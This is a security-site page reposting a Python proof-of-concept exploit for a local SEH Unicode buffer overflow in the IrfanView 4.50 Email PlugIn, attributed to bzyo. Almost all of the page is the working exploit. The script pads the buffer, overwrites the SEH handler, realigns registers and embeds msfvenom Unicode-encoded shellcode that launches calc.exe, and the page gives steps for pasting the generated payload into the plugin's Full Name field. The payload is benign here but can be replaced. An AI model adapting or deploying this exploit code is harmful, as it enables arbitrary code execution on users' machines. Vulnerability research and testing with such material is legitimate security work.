首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
IrfanView 4.50 Email Plugin - Buffer Overflow (SEH Unicode)
来源:@bzyo_ 作者:bzyo 发布时间:2018-03-05  
#!/usr/bin/python
 
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: IrfanView 4.50 Email PlugIn - Local Buffer Overflow (SEH Unicode)
# Date: 02-07-2018
# Vulnerable Software: IrfanView 4.50 Email PlugIn
# Vendor Homepage: http://www.irfanview.com/
# Version: 4.50
# Software Link: http://www.irfanview.info/files/irfanview_450.exe
# Software Link: http://www.irfanview.info/files/irfanview_plugins_450.zip
# Tested Windows 7 SP1 x86
#
# More reliable result if .NET and updates installed prior to application being installed
#
#
# PoC
# 1. generate irfan.txt, copy contents to clipboard
# 2. open IrfanView and a sample image from My Pictures (i.e. Chrysanthemum.jpg)
# 3. select Options, Send by Email, Settings
# 4. paste contents from clipboard into Full Name and select OK
# 5. application crashes
# 6. pop calc
#   ****if calc doesn't pop on first try, repeat steps 2-4 until it does :/
#
 
filename="irfan.txt"
 
#junk to offset
junk = "\x41"*262
 
#popad
nseh = "\x61\x62"
 
#0x00500102 pop esi pop ebx  ret 
#unicode possible ansi transform(s) : 0050008A->00500106,ascii {PAGE_EXECUTE_READ} [i_view32.exe]
seh = "\x8a\x50"
 
valign = (
"\x55"          #push ebp
"\x47"          #align
"\x58"          #pop eax
"\x47"          #align
"\x05\x14\x11"  #add eax,400
"\x47"          #align
"\x2d\x13\x11"  #sub eax,300
"\x47"          #align
"\x50"          #push eax
"\x47"          #align
"\xc3"          #retn
)
 
#nops to shellcode
nops = "\x71" * 109
 
#msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_upper BufferRegister=EAX
calc = (
"PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZ"
"ABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLJHE2KPKPM0C0U9IU01I02D4K0P004"
"K0RLLTK0RLT4KT2NHLOH7OZO601KOVLOLQQSLLBNLMPWQHOLMM197K2KBQB0WTK0RN0DKPJOLDK0LLQR"
"XIS18M1J121TK1IMPKQYC4KPILXJCOJQ9TKOD4KKQ8VP1KOFL91XOLMM1WWP8IPD5ZVLCCMKHOKSMO42"
"UK428DKPXNDM1ICBFTKLLPKDKB8MLM19CDKLD4KKQHP3YQ4O4MTQKQK1Q291JPQKOIP1OQOPZ4KLRJK4M"
"1MRJM14MU5WBM0M0M0R0QX014K2OTGKO9EGKL06UFBB6C85VF5GM5MKOJ5OLKVSLKZE0KKIPBUM57KQ7M"
"CSB2ORJM0PSKOIEBCC1BL1SNN2E2XC5M0AA"
)
 
#necessary fill
fill = "\x71"*1000
 
buffer = junk + nseh + seh + valign + nops + calc + fill
 
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·IrfanView 4.44 Email Plugin -
·SEGGER embOS/IP FTP Server 3.2
·ActivePDF Toolkit Code Executi
·DualDesk 20 - 'Proxy.exe' Deni
·Sony Playstation 4 (PS4) 4.07
·NETGEAR Magic telnetd Enabler
·Apple iOS 11.2.5 / watchOS 4.2
·Papenmeier WiFi Baby Monitor F
·Concrete5 < 8.3.0 - Username /
·Xion 1.0.125 - '.m3u' Local SE
·Microsoft Windows Windows 8.1/
·Dup Scout Enterprise 10.5.12 -
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved